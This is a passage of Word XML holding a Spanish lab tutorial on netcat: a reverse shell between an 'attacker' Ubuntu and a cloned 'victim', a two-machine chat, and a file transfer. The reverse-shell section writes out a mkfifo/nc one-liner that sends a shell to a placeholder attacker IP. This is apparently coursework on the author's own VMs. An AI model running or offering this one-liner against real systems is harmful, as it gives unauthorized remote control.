          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510C960F" wp14:editId="5094835C">
            <wp:extent cx="3095624" cy="1341238"/>
            <wp:effectExtent l="19050" t="19050" r="1016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628" cy="1354671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="00B050"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B99C26" w14:textId="616A3E18" w:rsidR="00844DC3" w:rsidRDefault="00692486" w:rsidP="00844DC3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>La segunda forma de hacer la Shell es usando mkfifo. Para eso, usare dos Ubuntu. El atacante será la maquina normal y la victima es el clon de la maquina normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D604CA" w14:textId="77777777" w:rsidR="00692486" w:rsidRDefault="00692486" w:rsidP="00692486">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00692486">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041BB818" wp14:editId="36723308">
            <wp:extent cx="2286319" cy="27626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319" cy="276264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00692486">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1459D7BA" wp14:editId="55B5ACC5">
            <wp:extent cx="1314633" cy="2476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4633" cy="247685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA8C94" w14:textId="3B0C24C9" w:rsidR="00692486" w:rsidRDefault="00692486" w:rsidP="00692486">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00692486">
        <w:t>Atacante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87C2CB" w14:textId="6648A236" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="068E69F0" w14:textId="059CF7EE" w:rsidR="00692486" w:rsidRDefault="00692486" w:rsidP="00844DC3">
      <w:r>
        <w:t xml:space="preserve">En el </w:t>
      </w:r>
      <w:r w:rsidR="009B2BA4">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>tacante</w:t>
      </w:r>
      <w:r w:rsidR="009B2BA4">
        <w:t xml:space="preserve"> pondremos lo siguiente “nc -lvp 1234”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0103F" w14:textId="1D964426" w:rsidR="009B2BA4" w:rsidRDefault="009B2BA4" w:rsidP="009B2BA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="356872F5" wp14:editId="39FF98D0">
            <wp:extent cx="4648193" cy="306121"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="177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466" cy="315162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C11E74" w14:textId="6D7FF6F0" w:rsidR="009B2BA4" w:rsidRDefault="009B2BA4" w:rsidP="009B2BA4"/>
    <w:p w14:paraId="61314534" w14:textId="31972C01" w:rsidR="009B2BA4" w:rsidRDefault="009B2BA4" w:rsidP="009B2BA4">
      <w:r>
        <w:t>Ahora en la maquina victima pondremos lo siguiente “</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2BA4">
        <w:t xml:space="preserve">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r>
        <w:t>X.X.X.X</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2BA4">
        <w:t xml:space="preserve"> 1234 &gt;/tmp/f</w:t>
      </w:r>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCC364" w14:textId="68A61AF4" w:rsidR="009B2BA4" w:rsidRPr="009B2BA4" w:rsidRDefault="009B2BA4" w:rsidP="009B2BA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2BA4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Las “X.X.X.X” lo sustituiremos por la IP del atacante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4D617" w14:textId="4972D75C" w:rsidR="009B2BA4" w:rsidRDefault="00985EE0" w:rsidP="009B2BA4">
      <w:r w:rsidRPr="00985EE0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55BCC41B" wp14:editId="46DA372E">
            <wp:extent cx="6188710" cy="205740"/>
            <wp:effectExtent l="0" t="0" r="254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05740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D5A0C" w14:textId="0E444984" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="7BF6C165" w14:textId="32E9DD77" w:rsidR="009B2BA4" w:rsidRDefault="009B2BA4" w:rsidP="00844DC3">
      <w:r>
        <w:t>Si nos vamos ahora a la maquina atacante, veremos que tenemos ya la Shell creada. A si que vamos a poner un comando para confirmarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438ED19" w14:textId="2ECAF5DF" w:rsidR="00985EE0" w:rsidRDefault="009B2BA4" w:rsidP="00844DC3">
      <w:r>
        <w:t>El comando que voy a poner es “nano /etc/hosts”</w:t>
      </w:r>
      <w:r w:rsidR="00985EE0">
        <w:t xml:space="preserve"> y nos debería salir el nombre de host de la víctima (clon):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4E2764" w14:textId="4198F625" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00985EE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00985EE0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="707B4A28" wp14:editId="54A7A3EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1400175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>64135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3777817" cy="714375"/>
            <wp:effectExtent l="19050" t="19050" r="1333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77817" cy="714375"/>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p>
    <w:p w14:paraId="2F8D60D1" w14:textId="619510D4" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00985EE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FC78B5" w14:textId="02DAD7CD" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="120664EF" w14:textId="78CA01AE" w:rsidR="00844DC3" w:rsidRDefault="00985EE0" w:rsidP="00844DC3">
      <w:r w:rsidRPr="00985EE0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D71C68E" wp14:editId="2E50548B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1786890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>219710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3068955" cy="1992319"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="273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20056"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3068955" cy="1992319"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>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4073" w14:textId="27A956B3" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="6FE39907" w14:textId="616EF56B" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="0C18E08E" w14:textId="316B687A" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="0093CF57" w14:textId="4185E6DE" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="48F69735" w14:textId="78AF5B0E" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="7A45292F" w14:textId="255CCBA3" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="73FCE3F5" w14:textId="0FC39D7D" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="5E7D8320" w14:textId="101C4C1C" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="28A07FED" w14:textId="5850AF87" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="2A6AABB4" w14:textId="77777777" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="5ED497BC" w14:textId="26DBA05D" w:rsidR="00985EE0" w:rsidRPr="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3">
      <w:r w:rsidRPr="00985EE0">
        <w:t xml:space="preserve">Efectivamente nos sale el nombre de hosts de la víctima (Ubuntu clon) por lo que esta reverse Shell funciona </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB79749" w14:textId="403391BA" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="156A6DFB" w14:textId="4433B64B" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="0EE52401" w14:textId="77777777" w:rsidR="00985EE0" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="2B194146" w14:textId="02E9E822" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="627B21B0" w14:textId="28C845C4" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="26293F1B" w14:textId="1766AC8D" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="58F66A79" w14:textId="005F8837" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="1A3E3407" w14:textId="77777777" w:rsidR="00985EE0" w:rsidRPr="00844DC3" w:rsidRDefault="00985EE0" w:rsidP="00844DC3"/>
    <w:p w14:paraId="324BFAF2" w14:textId="746146D5" w:rsidR="00C24B15" w:rsidRDefault="00C24B15" w:rsidP="00C24B15">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Netcat_como_chat"/>
      <w:bookmarkStart w:id="12" w:name="_Toc182474730"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Netcat como chat entre dos equipos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="52E74C78" w14:textId="78A0B178" w:rsidR="00C24B15" w:rsidRDefault="0052516B" w:rsidP="009E303F">
      <w:r>
        <w:t>Primero un equipo tendrá que hacer de servidor, para eso ponemos el comando visto anteriormente “nc -l -p 80” para escuchar por el puerto 80 todas las conexiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C54127" w14:textId="7258891B" w:rsidR="0052516B" w:rsidRDefault="0052516B" w:rsidP="0052516B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00981B19">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E5D709" wp14:editId="0D4A3178">
            <wp:extent cx="4353533" cy="304843"/>
            <wp:effectExtent l="19050" t="19050" r="952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533" cy="304843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990B9B5" w14:textId="50218364" w:rsidR="0052516B" w:rsidRDefault="0052516B" w:rsidP="0052516B"/>
    <w:p w14:paraId="30BA60E1" w14:textId="66C8B710" w:rsidR="0052516B" w:rsidRDefault="0052516B" w:rsidP="0052516B">
      <w:r>
        <w:t>En el otro equipo pondremos lo siguiente “ncat ip_escuchando puerto”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140B404" w14:textId="50F9C1CA" w:rsidR="00C24B15" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00001277">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CBE11C5" wp14:editId="42BC684A">
            <wp:extent cx="2848373" cy="409632"/>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409632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C333C" w14:textId="559637E6" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277"/>
    <w:p w14:paraId="7EEB47BF" w14:textId="42239E65" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:r>
        <w:t>Con esto ya tendríamos un chat entre ambos equipos. Para comprobar que funciona, voy a escribir algo en el Windows y voy a comprobar que aparece en el Ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B806BD2" w14:textId="5B7592EA" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:r>
        <w:t>En el Windows escribiré lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892124B" w14:textId="5D2750CA" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00001277">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C468157" wp14:editId="2B5041C9">
            <wp:extent cx="3219450" cy="631265"/>
            <wp:effectExtent l="19050" t="19050" r="19050"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9100" cy="633157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent5"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48534746" w14:textId="4827C7B4" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277"/>
    <w:p w14:paraId="39252533" w14:textId="067A8440" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:r>
        <w:t>Ahora si vamos al Ubuntu, vemos que efectivamente aparece dicho mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530422D" w14:textId="6E7E8732" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00001277">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EDE32F" wp14:editId="0AFA053D">
            <wp:extent cx="4724400" cy="549349"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="222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1415" cy="571095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="00B050"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29727F" w14:textId="581D6CD9" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277"/>
    <w:p w14:paraId="7BE5AB27" w14:textId="34E3EDB5" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="2722FA05" w14:textId="03DE4D50" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="0248B216" w14:textId="39E49610" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="115DB3C4" w14:textId="52C6296A" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="172F9EBA" w14:textId="18E90988" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="3F1F7694" w14:textId="3514F33E" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="7FC46571" w14:textId="2C748AAD" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="0DF8D49C" w14:textId="1E011C45" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="2BA6545D" w14:textId="26FF50B3" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="2BC79F7F" w14:textId="243E9505" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="0FE7980B" w14:textId="42C08C74" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="6FD9094B" w14:textId="74466333" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="4B589D87" w14:textId="21A02394" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="1781AEF3" w14:textId="65214D02" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="4994306D" w14:textId="55129240" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="4481741F" w14:textId="35509F0E" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="70F2B519" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00001277"/>
    <w:p w14:paraId="06162EE7" w14:textId="0F8F191D" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Transferir_archivos_de"/>
      <w:bookmarkStart w:id="14" w:name="_Toc182474731"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Transferir archivos de un equipo a otro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5E9DDD4D" w14:textId="5481D03C" w:rsidR="00C24B15" w:rsidRDefault="00001277" w:rsidP="009E303F">
      <w:r>
        <w:t>Para transferir archivos de un equipo (Windows) a otro (</w:t>
      </w:r>
      <w:r w:rsidR="00844DC3">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t>) usando netcat lo primero que haremos será crear un archivo en el equipo Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA6786" w14:textId="4B46EE76" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00001277">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B36EF6B" wp14:editId="5A8B5E77">
            <wp:extent cx="3276599" cy="1566445"/>
            <wp:effectExtent l="19050" t="19050" r="19685"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1428" cy="1573534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B1E05" w14:textId="0A6B7E3C" w:rsidR="00C24B15" w:rsidRDefault="00C24B15" w:rsidP="009E303F"/>
    <w:p w14:paraId="18E4D880" w14:textId="26550F7D" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="009E303F">
      <w:r>
        <w:t>Ahora queremos pasar ese archivo al Ubuntu, pero llamándose “secreto” en vez de “windows”. Para eso, en la maquina Ubuntu pondremos el siguiente comando “nc -l -p 80 &gt; secreto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FFFDC" w14:textId="1A06DB77" w:rsidR="00001277" w:rsidRPr="00445761" w:rsidRDefault="00001277" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El &gt; secreto es para</w:t>
      </w:r>
      <w:r w:rsidR="00445761" w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicar que el archivo que vamos a transferir de Windows se meta en un archivo llamado secreto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6830C" w14:textId="52017CC3" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="00001277">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00001277">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E1C2068" wp14:editId="3813E7E9">
            <wp:extent cx="5277587" cy="285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587" cy="285790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01398C51" w14:textId="6EB49CF9" w:rsidR="00C24B15" w:rsidRDefault="00C24B15" w:rsidP="009E303F"/>
    <w:p w14:paraId="21F6F9AA" w14:textId="6698A0B5" w:rsidR="00001277" w:rsidRDefault="00001277" w:rsidP="009E303F">
      <w:r>
        <w:t>Luego en la maquina Windows pondremos el siguiente comando</w:t>
      </w:r>
      <w:r w:rsidR="00445761">
        <w:t xml:space="preserve"> “ncat ip_escuchando puerto &lt; Windows.txt</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A2848" w14:textId="59F438D9" w:rsidR="00445761" w:rsidRPr="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El &lt; Windows.txt es para decir que queremos transferir ese archivo a la victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63582E4C" w14:textId="68EDDECE" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="00445761">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="220D4F18" wp14:editId="73A00449">
            <wp:extent cx="4525006" cy="352474"/>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352474"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3F1E1" w14:textId="088963D9" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Al poner el comando el Windows, la conexión se cierra automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C83B99" w14:textId="77777777" w:rsidR="00445761" w:rsidRPr="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757C67AF" w14:textId="1D068B0E" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F">
      <w:r>
        <w:t>El siguiente paso es ir al Ubuntu y comprobar el archivo llamado “secreto” a ver si tiene lo mismo que pusimos en el archivo llamado “windows”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E97FA2D" w14:textId="560132BE" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="00445761">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679C7D52" wp14:editId="6C4998B8">
            <wp:extent cx="4380865" cy="704850"/>
